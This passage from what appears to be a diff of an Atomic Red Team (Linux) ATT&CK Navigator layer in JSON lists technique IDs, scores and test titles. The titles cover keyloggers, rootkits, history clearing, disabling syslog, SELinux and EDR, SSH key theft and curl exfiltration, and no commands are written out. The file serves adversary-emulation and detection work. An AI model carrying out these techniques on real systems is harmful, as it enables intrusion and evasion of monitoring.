Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"comment":"\n- Create Systemd Service and Timer\n- Create a user level transient systemd service and timer\n- Create a system level transient systemd service and timer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1056","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":5,"enabled":true,"comment":"\n- Living off the land Terminal Input Capture on Linux with pam.d\n- Logging bash history to syslog\n- Bash session based keylogger\n- SSHD PAM keylogger\n- Auditd keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.004","score":11,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n- Harvest SUID executable files\n- LinEnum tool execution\n- New script file in the tmp directory\n- What shell is running\n- What shells are available\n- Command line scripts\n- Obfuscated command line scripts\n- Change login shell\n- Environment variable scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"comment":"\n- Execute shell script via python's command mode arguement\n- Execute Python via scripts (Linux)\n- Execute Python via Python executables (Linux)\n- Python pty module and spawn function used to spawn sh or bash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":3,"enabled":true,"comment":"\n- rm -rf\n- Overwrite Linux Mail Spool\n- Overwrite Linux Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":9,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear Bash history (echo)\n- Clear Bash history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear Bash history (truncate)\n- Clear history of a bunch of shells\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n- Disable Bash History Logging with SSH -T\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":4,"enabled":true,"comment":"\n- Delete a single file - Linux/macOS\n- Delete an entire folder - Linux/macOS\n- Overwrite and delete a file with shred\n- Delete Filesystem - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":1,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1082","score":6,"enabled":true,"comment":"\n- List OS Information\n- Linux VM Check via Hardware\n- Linux VM Check via Kernel Modules\n- Hostname Discovery\n- Environment variables discovery on macos and linux\n- Linux List Kernel Modules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":6,"enabled":true,"comment":"\n- Enumerate all accounts (Local)\n- View sudoers access\n- View accounts with UID 0\n- List opened files by user\n- Show if a user account has ever logged in remotely\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- Connection Proxy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":1,"enabled":true,"comment":"\n- Tor Proxy Usage - Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":8,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n- Linux Download File and Run\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":2,"enabled":true,"comment":"\n- SUDO brute force Debian\n- SUDO brute force Redhat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- SSH Credential Stuffing From Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- X Windows Capture\n- Capture Linux Desktop using Import Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Add or copy content to clipboard with xClip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- Base64 Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":1,"enabled":true,"comment":"\n- Network Share Discovery - linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":2,"enabled":true,"comment":"\n- Create a user account on a Linux system\n- Create a new user in Linux with `root` UID and GID.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1140","score":4,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Hex decoding with shell utilities\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":3,"enabled":true,"comment":"\n- Chrome (Developer Mode)\n- Chrome (Chrome Web Store)\n- Firefox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":4,"enabled":true,"comment":"\n- Examine password complexity policy - Ubuntu\n- Examine password complexity policy - CentOS/RHEL 7.x\n- Examine password complexity policy - CentOS/RHEL 6.x\n- Examine password expiration policy - All Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":1,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":11,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- Chmod through c script\n- Chown through c script\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":4,"enabled":true,"comment":"\n- Encrypt files using gpg (Linux)\n- Encrypt files using 7z (Linux)\n- Encrypt files using ccrypt (Linux)\n- Encrypt files using openssl (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":1,"enabled":true,"comment":"\n- Detect Virtualization Environment (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":1,"enabled":true,"comment":"\n- Security Software Discovery - ps (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":7,"enabled":true,"comment":"\n- Restart System via `shutdown` - macOS/Linux\n- Shutdown System via `shutdown` - macOS/Linux\n- Restart System via `reboot` - macOS/Linux\n- Shutdown System via `halt` - Linux\n- Reboot System via `halt` - Linux\n- Shutdown System via `poweroff` - Linux\n- Reboot System via `poweroff` - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.002","score":2,"enabled":true,"comment":"\n- Create Systemd Service\n- Create Systemd Service file,  Enable the service , Modify and Reload the service.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":5,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n- Append to the system shell profile\n- Append commands user shell profile\n- System shell profile scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":2,"enabled":true,"comment":"\n- Trap EXIT\n- Trap SIGINT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Linux - Load Kernel Module via insmod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":7,"enabled":true,"comment":"\n- Make and modify binary from C source\n- Set a SetUID flag on file\n- Set a SetGID flag on file\n- Make and modify capabilities of a binary\n- Provide the SetUID capability to a file\n- Do reconnaissance for files that have the setuid bit set\n- Do reconnaissance for files that have the setgid bit set\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":3,"enabled":true,"comment":"\n- Sudo usage\n- Unlimited sudo cache timeout\n- Disable tty_tickets for sudo caching\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":2,"enabled":true,"comment":"\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":1,"enabled":true,"comment":"\n- Search Through Bash History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":4,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with CP\n- Copy Private SSH Keys with rsync\n- Copy the users GnuPG directory with rsync\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- Cat the contents of a Kubernetes service account token file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":2,"enabled":true,"comment":"\n- Install root CA on CentOS/RHEL\n- Install root CA on Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.003","score":1,"enabled":true,"comment":"\n- LaZagne.py - Dump Credentials from Firefox Browser\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1556","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.003","score":2,"enabled":true,"comment":"\n- Malicious PAM rule\n- Malicious PAM module\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"comment":"\n- Compressing data using GZip in Python (Linux)\n- Compressing data using bz2 in Python (Linux)\n- Compressing data using zipfile in Python (Linux)\n- Compressing data using tarfile in Python (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":9,"enabled":true,"comment":"\n- Disable syslog\n- Disable Cb Response\n- Disable SELinux\n- Stop Crowdstrike Falcon on Linux\n- Clear History\n- Suspend History\n- Reboot Linux Host via Kernel System Request\n- Clear Pagging Cache\n- Disable Memory Swap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":2,"enabled":true,"comment":"\n- Disable history collection\n- Mac HISTCONTROL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Stop/Start UFW firewall\n- Stop/Start UFW firewall systemctl\n- Turn off UFW logging\n- Add and delete UFW firewall rules\n- Edit UFW firewall user.rules file\n- Edit UFW firewall ufw.conf file\n- Edit UFW firewall sysctl.conf file\n- Edit UFW firewall main configuration file\n- Tail the UFW firewall log file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":2,"enabled":true,"comment":"\n- Auditing Configuration Changes on Linux Host\n- Logging Configuration Changes on Linux Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":1,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":1,"enabled":true,"comment":"\n- psexec.py (Impacket)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":2,"enabled":true,"comment":"\n- Shared Library Injection via /etc/ld.so.preload\n- Shared Library Injection via LD_PRELOAD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1614","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":4,"enabled":true,"comment":"\n- Discover System Language with locale\n- Discover System Language with localectl\n- Discover System Language by locale file\n- Discover System Language by Environment Variable Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team (Linux)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Linux"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.007","score":3,"enabled":true,"comment":"\n- Dump individual process memory with sh (Local)\n- Dump individual process memory with Python (Local)\n- Capture Passwords with MimiPenguin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":4,"enabled":true,"comment":"\n- Access /etc/shadow (Local)\n- Access /etc/passwd (Local)\n- Access /etc/{shadow,passwd} with a standard bin that's not cat\n- Access /etc/{shadow,passwd} with shell builtins\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1007","score":1,"enabled":true,"comment":"\n- System Service Discovery - systemctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"comment":"\n- Loadable Kernel Module based Rootkit\n- Loadable Kernel Module based Rootkit\n- dynamic-linker based rootkit (libprocesshider)\n- Loadable Kernel Module based Rootkit (Diamorphine)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":1,"enabled":true,"comment":"\n- System Network Configuration Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":5,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n- Remote System Discovery - ip neighbour\n- Remote System Discovery - ip route\n- Remote System Discovery - ip tcp_metrics\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":1,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX (linux)\n- Binary packed by UPX, with modified headers (linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":1,"enabled":true,"comment":"\n- Masquerading as Linux crond process.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":1,"enabled":true,"comment":"\n- Space After Filename\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.004","score":2,"enabled":true,"comment":"\n- rc.common\n- rc.local\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Linux using tshark or tcpdump\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo\n- Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo\n- Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":2,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":3,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - DNS\n- Python3 http.server\n","links":[{"label":"View 